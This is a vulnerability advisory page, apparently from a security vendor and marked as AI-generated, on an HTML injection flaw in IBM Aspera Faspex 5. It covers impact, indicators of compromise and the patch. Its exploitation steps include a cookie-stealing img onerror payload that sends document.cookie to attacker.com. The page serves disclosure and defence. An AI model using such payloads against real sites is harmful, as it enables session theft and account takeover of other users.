CVE-2025-36230
IBM Aspera Faspex vulnerability analysis and mitigation

Overview

CVE-2025-36230 is an HTML injection vulnerability in IBM Aspera Faspex 5, affecting versions 5.0.0 through 5.0.14.1. A remote attacker with low-privileged access can inject malicious HTML code that, when viewed by a victim, executes within the victim's web browser under the security context of the hosting site. The vulnerability was disclosed on December 26, 2025, with a patch released as version 5.0.14.2. It carries a CVSS v3.1 base score of 5.4 (Medium), assigned by IBM Corporation (IBM Advisory, Red Hat CVE).

Technical details

The root cause is classified as CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page / Basic XSS), meaning the application fails to properly sanitize or encode user-supplied input before rendering it in web pages. An authenticated attacker with low privileges can craft and submit malicious HTML content through the application, which is then stored or reflected and subsequently rendered in other users' browsers within the Aspera Faspex site's security context. Exploitation requires user interaction — a victim must view the injected content — and the attack vector is network-based with low complexity. Related attack patterns include XSS targeting non-script elements (CAPEC-18) and XSS through HTTP query strings (CAPEC-32) (IBM Advisory, Feedly).

Impact

Successful exploitation allows an attacker to execute malicious scripts in victims' browsers within the application's security context, potentially enabling session token theft, credential harvesting, and unauthorized actions performed on behalf of the victim. The confidentiality and integrity impacts are both rated Low (scoped as Changed), meaning the attacker can affect resources beyond their own authorization boundary. Availability is not impacted. While the vulnerability alone does not grant direct server-side access, stolen session data could facilitate further account compromise or lateral movement within the application (IBM Advisory, Feedly).

Exploitation steps

  1. Reconnaissance: Identify IBM Aspera Faspex 5 instances running versions 5.0.0 through 5.0.14.1 accessible over the network, using version banners or application fingerprinting.
  2. Obtain low-privileged access: Register or use an existing low-privileged account on the Aspera Faspex instance, as the vulnerability requires authenticated access (PR:L).
  3. Identify injection point: Locate input fields within the application (e.g., package notes, metadata fields, or user profile fields) that accept and render user-supplied content to other users.
  4. Craft malicious HTML payload: Prepare an HTML injection payload such as <img src=x onerror=document.location='https://attacker.com/steal?c='+document.cookie> or similar script-bearing HTML tags.
  5. Submit payload: Submit the crafted payload through the identified input field so it is stored or reflected within the application.
  6. Victim interaction: Wait for or socially engineer a victim (e.g., an administrator) to view the page containing the injected content, triggering execution of the malicious HTML/script in their browser.
  7. Harvest results: Collect stolen session tokens, credentials, or other sensitive data exfiltrated to the attacker-controlled server, potentially enabling account takeover (IBM Advisory, Feedly).

Indicators of compromise

  • Logs: Aspera Faspex application logs showing unusual input submissions containing HTML tags (e.g., <script>, <img>, <iframe>, onerror=) in user-controlled fields; web server access logs with requests containing encoded HTML entities (%3Cscript%3E, %3Cimg%3E) in POST body parameters.
  • Network: Outbound HTTP/HTTPS requests from victim browsers to unexpected external domains shortly after accessing Aspera Faspex pages, potentially carrying cookie or session data in query parameters.
  • Application Behavior: Unexpected redirects or pop-ups experienced by users when viewing specific packages, messages, or profile pages within the Aspera Faspex interface.
  • File System: No direct file system artifacts expected for a client-side HTML injection; however, review server-side stored content (database entries) for embedded HTML or script tags in user-supplied fields.

Mitigation and workarounds

IBM has released IBM Aspera Faspex version 5.0.14.2 to address this vulnerability; upgrading to this version or later is the primary recommended remediation (IBM Advisory). As interim mitigations, administrators should implement a strict Content Security Policy (CSP) to limit script execution, enforce rigorous input validation and output encoding at the application layer, and restrict user privileges to the minimum necessary. Monitoring application logs for HTML injection patterns and conducting user security awareness training are also recommended defensive measures.

Community reactions

The vulnerability received routine coverage from vulnerability tracking services including Tenable, VulnDB, CIRCL, and ENISA's EUVD shortly after disclosure. A brief post appeared on Bluesky via an automated CVE feed, and the Spanish CCN-CERT published a vulnerability notice. No significant researcher commentary, vendor statements beyond the IBM advisory, or notable media coverage has been identified for this medium-severity issue (Feedly).

Additional resources


SourceThis report was generated using AI

Related IBM Aspera Faspex vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2025-36227MEDIUM5.4
  • IBM Aspera Faspex logoIBM Aspera Faspex
  • cpe:2.3:a:ibm:aspera_faspex
NoYesMar 10, 2026
CVE-2025-36226MEDIUM5.4
  • IBM Aspera Faspex logoIBM Aspera Faspex
  • cpe:2.3:a:ibm:aspera_faspex
NoYesMar 10, 2026
CVE-2025-36230MEDIUM5.4
  • IBM Aspera Faspex logoIBM Aspera Faspex
  • cpe:2.3:a:ibm:aspera_faspex
NoYesDec 26, 2025
CVE-2025-36229MEDIUM4.3
  • IBM Aspera Faspex logoIBM Aspera Faspex
  • cpe:2.3:a:ibm:aspera_faspex
NoYesDec 26, 2025
CVE-2025-36228LOW3.8
  • IBM Aspera Faspex logoIBM Aspera Faspex
  • cpe:2.3:a:ibm:aspera_faspex
NoYesDec 26, 2025

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management